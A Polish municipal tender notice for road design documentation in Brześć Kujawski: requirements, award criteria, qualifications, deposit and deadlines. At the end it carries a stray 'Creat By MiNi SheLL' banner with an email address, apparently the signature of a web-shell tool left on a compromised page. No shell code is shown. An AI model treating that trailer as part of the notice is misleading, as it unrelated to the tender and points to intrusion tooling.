Odwodnienie: Projektowane indywidualnie dla każdej drogi (rowy, przepusty, drenaż).<br/>•	Oświetlenie: Obowiązkowe dla dróg nr 1 i 3 – system LED .<br/>•	Doświetlenie ewentualnych przejść dla pieszych.<br/>3. Wymagania formalno-prawne<br/>•	Decyzje administracyjne:<br/>-	Zgłoszenie robót budowlanych dla dróg w istniejącym paśmie drogowym.<br/>-	Pozwolenie na budowę lub ZRID dla dróg na działkach współwłasnościowych.<br/>•	Uzgodnienia:<br/>-	Z gestorami sieci (gaz, energia, woda) – obowiązkowe dla wszystkich kolizji.<br/>-	z zarządcą drogi powiatowej nr 2906C.<br/>•	Harmonogram:<br/>-	Termin realizacji dokumentacji: 30.06.2026 r., z wyjątkiem Budowy ścieżki rowerowej w m. Rzadka Wola termin realizacji: 30.09.2025.<br/>-	Aktualizacja kosztorysów: 2 razy w ciągu 24 miesięcy.<br/>4. Dodatkowe informacje.<br/>•	Stan prawny działek: Konieczność uregulowania statusu prawnego gruntów prywatnych drogi Wieniec – Lipiny. Włączenie drogi gminnej <br/>w miejscowości Lipiny –na chwilę obecną istniejąca droga biegnie przez grunty prywatne i grunty własności GDDKiA jednakże trwają prace aby stan prawny w najbliższym czasie został sprostowany)<br/>•	System odwadniania: Projektant samodzielnie określa rozwiązania techniczne.<br/>•	Gwarancja: 24 miesiące od odbioru dokumentacji.<br/>5. Uwagi końcowe<br/>	Wszelkie zmiany w harmonogramie wymagają uzgodnienia <br/>z Zamawiającym.<br/>	Dokumentacja musi być przygotowana zgodnie z obowiązującymi przepisami prawa budowlanego oraz innymi regulacjami związanymi <br/>z projektowaniem i realizacją inwestycji drogowych.<br/>	Granice pasa drogowego winny zostać zbadane przez uprawnionego geodetę na etapie sporządzania mapy do celów projektowych.<br/>	Wykonawca winien uzyskać aktualne mapy sytuacyjno-wysokościowe z inwentaryzacją istniejącej infrastruktury.<br/>Informacje dotyczące oferty wariantowej, o której mowa w art. 92 ustawy Pzp: Zamawiający nie dopuszcza składania ofert wariantowych. <br/>Dokumentacja graficzna załączona do SWZ ma wyłącznie charakter poglądowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty przyznane przez każdego z członków Komisji przetargowej zostaną zsumowane dla każdego z<br/>kryteriów oddzielnie. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa – część 1 i 2<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br/>Wykonawca musi się wykazać doświadczeniem w wykonaniu 1 usługi: w okresie ostatnich 3 lat przed upływem terminu składania ofert – min. 2 dokumentacji o wartości nie mniejszej niż 50 000 zł brutto, której przedmiotem było wykonanie dokumentacji projektowej dotyczącej rozbudowy lub budowy lub przebudowy dróg.<br/>b) Osób: Wykonawca musi wskazać osoby, które będą uczestniczyć <br/>w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi i doświadczeniem odpowiednim do funkcji, jakie zostaną im powierzone: Wykonawca wykaże osoby zdolne do wykonania zamówienia:<br/>- Projektant z uprawnieniami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych<br/>- Projektant z uprawnieniami w specjalności drogowej bez ograniczeń.<br/>Zdolność do występowania w obrocie gospodarczym – część 1 i 2<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania zdolności <br/>do występowania w obrocie gospodarczym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykaz osób<br/>2. Wykaz usług<br/>3. Zaświadczenie właściwego naczelnika urzędu skarbowego<br/>4. Zaświadczenie z ZUS lub KRUS<br/>5. Dokument potwierdzający niezaleganie z opłacaniem podatków, opłat lub składek na ubezpieczenie społeczne lub<br/>zdrowotne (dla<br/>podmiotów zagranicznych)<br/>6. Zobowiązanie podmiotu udostępniającego zasoby</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Oświadczenie wykonawcy w sprawie grupy kapitałowej – <br/>część 1 i 2<br/>2. Odpis lub informacja z KRS lub CEIDG – część 1 i 2<br/>3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości:<br/>Dla części zamówienia nr 1: 1 800.00 PLN (słownie: jeden tysiąc osiemset 00/100 PLN)<br/>Dla części zamówienia nr 2: 9 500.00 PLN (słownie: dziewięć tysięcy pięćset 00/10)<br/>2.	Wadium musi zostać wniesione przed upływem terminu składania ofert, <br/>tj. do dnia 2025-06-25. do godz. 09:30, według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2023r. poz. 462).<br/>3.	Wadium musi obejmować pełen okres związania ofertą tj. do dnia 2025-07-24.<br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: PKO Bank Polski nr rachunku <br/>06 1020 1462 0000 7102 0454 8038, (w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty <br/>w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji oraz powinno zawierać:<br/>1)	wskazanie Beneficjenta poręczenia lub gwarancji, którym musi być Gmina Brześć Kujawski, pl. Władysława Łokietka 1 , 87-880 Brześć Kujawski;<br/>2)	nazwę i adres siedziby Wykonawcy;<br/>3)	kwotę i termin ważności gwarancji/poręczenia;<br/>4)	bezwarunkowe zobowiązanie wystawcy poręczenia lub gwarancji do zapłaty kwoty wadium, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>2. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać<br/>w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu<br/>wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 SWZ, składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia<br/>te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału<br/>w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) Zmiana terminu realizacji umowy - w przypadku wystąpienia okoliczności niezależnych od stron umowy powodujących, że<br/>realizacja inwestycji w umownym terminie stanie się niemożliwa.<br/>b) Zmiana danych teleadresowych - w przypadku zmiany danych kontaktowych i/lub siedziby stron umowy w okresie jej<br/>trwania.<br/>c) Zmiana danych dotyczących rachunku bankowego - w przypadku zmiany banku i/lub nr rachunku bankowego stron<br/>umowy w okresie jej trwania.<br/>d) Zmiana danych dotyczących warunków płatności (np. wprowadzenie płatności zaliczkowej lub częściowej) - w przypadku<br/>wystąpienia okoliczność niezależnych od stron umowy, mających wpływ na realizację przedmiotu zamówienia.<br/>e) Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego.<br/>Strony przewidują zmianę umowy zgodnie z 455 ust. 1 pkt 1 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-25 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com